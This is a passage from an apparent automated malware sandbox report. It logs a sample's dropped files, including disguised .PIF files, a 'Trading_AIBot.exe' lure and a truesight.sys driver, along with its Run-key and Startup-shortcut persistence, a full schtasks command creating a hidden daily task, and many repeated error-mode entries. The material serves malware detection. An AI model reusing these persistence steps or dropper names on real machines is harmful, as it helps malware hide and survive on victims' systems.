                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C37393 push FFFFFFC3h; ret | 6_2_02C37426
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C3635A push 02C363B7h; ret | 6_2_02C363AF
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C3635C push 02C363B7h; ret | 6_2_02C363AF
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C43307 push 8402C336h; ret | 6_2_02C432A9
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C43307 push FFFFFFC3h; ret | 6_2_02C4333E
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C37337 push FFFFFFC3h; ret | 6_2_02C37316
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C37337 push FFFFFFC3h; ret | 6_2_02C37372
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C3708B push FFFFFFC3h; ret | 6_2_02C37092
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C4308F push 02C43041h; ret | 6_2_02C43039
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C5C0AC push 02C5C125h; ret | 6_2_02C5C11D
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C371C7 push FFFFFFC3h; ret | 6_2_02C3725A
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C371C7 push FFFFFFC3h; ret | 6_2_02C372B6
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C5C1F8 push 02C5C288h; ret | 6_2_02C5C280
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C5C144 push 02C5C1ECh; ret | 6_2_02C5C1E4
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C486C0 push 02C48702h; ret | 6_2_02C486FA
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C396E0 pushfd ; ret | 6_2_02C396E3
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C396AE pushfd ; ret | 6_2_02C396AF
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C36740 push 02C36782h; ret | 6_2_02C3677A
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C3673E push 02C36782h; ret | 6_2_02C3677A
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C3C4F4 push ecx; mov dword ptr [esp], edx | 6_2_02C3C4F9

                      Persistence and Installation Behavior

                      Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\x.vbs
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\Public\Libraries\Oupzhkpr.PIF
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Windows \SysWOW64\truesight.sys
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | File created: C:\Windows \SysWOW64\truesight.sys
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | File created: C:\Windows \SysWOW64\truesight.sys
                      Source: C:\Windows\System32\cscript.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\Public\Libraries\Oupzhkpr.PIF
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | File created: C:\Users\user\AppData\Local\Temp\Microsofts.exe
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | File created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | File created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

                      Boot Survival

                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Oupzhkpr
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Oupzhkpr

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C4A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 6_2_02C4A95C
                      Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cscript.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cscript.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
